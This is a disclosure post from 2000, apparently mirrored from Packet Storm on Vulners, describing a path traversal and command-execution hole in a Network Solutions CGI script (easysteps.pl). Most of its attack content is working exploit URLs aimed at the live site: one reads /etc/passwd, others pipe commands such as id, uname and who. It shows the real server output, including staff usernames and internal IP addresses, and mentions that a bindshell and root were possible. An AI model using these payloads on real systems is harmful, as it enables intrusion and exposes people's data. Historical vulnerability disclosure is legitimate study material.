Lucene search
K

netsolbug.txt

🗓️ 09 May 2000 00:00:00Reported by vade79Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Major security bug in networksolutions.com allows unauthorized file access and execution.

Code
`networksolutions.com: www security hole. (may/9/2000)  
  
Major security issue with networksolutions.com(easysteps.pl). I was in   
#r00tabega, and someone relayed this(it was told to me Mr^Chaos found the  
orginal read bug):  
  
http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=maymun.com&FILE=/../../../../../../../etc/passwd  
  
And I so with that initial bug found, I downloaded the perl script with the bug  
itself. I noticed that a bigger problem existed:  
  
---  
  
open(CURR_FILE,$finalpath) or die "EASYSTEPS: Can't open file $finalpath\n";  
my @LINES = <CURR_FILE>;  
close(CURR_FILE);  
  
---  
  
$finalpath is for the most part supplied by the user. Knowning that open() can  
be used to execute programs, I used the initial bug for this, by going to   
the root dir and then accessing the file I wanted to execute followed by the  
pipe:  
  
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/id|  
return: uid=60001(nobody) gid=60001(nobody)  
  
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/uname%20-a|  
return: SunOS www1 5.6 Generic_105181-15 sun4u sparc SUNW,Ultra-Enterprise  
  
opened: http://www.networksolutions.com/cgi-bin/makechanges/easysteps/easysteps.pl?STRING=null&FILE=/../../../../../../../bin/who|  
return: "  
matthewh pts/1 Apr 17 11:32 (216.168.238.173)  
rholgado pts/2 Apr 17 15:35 (216.168.235.124)  
schauhan pts/3 May 4 16:05 (216.168.238.21)  
pvirador pts/4 Apr 20 17:02 (216.168.238.21)  
rholgado pts/5 Apr 18 13:39 (216.168.235.124)  
rholgado pts/6 Apr 18 13:40 (216.168.235.124)  
"  
  
I decided NOT to be retarded. But, I could have wrote a bindshell to a tmp  
directory and connected. While looking around the system I noticed some  
public exploits that would have been able to get me root.  
  
I just thought this was worth commenting on of a major corp, with  
such a obvious bug. (I don't want to goto jail, I don't know about you.)  
  
vade79[[email protected]] -> www.fakehalo.org  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation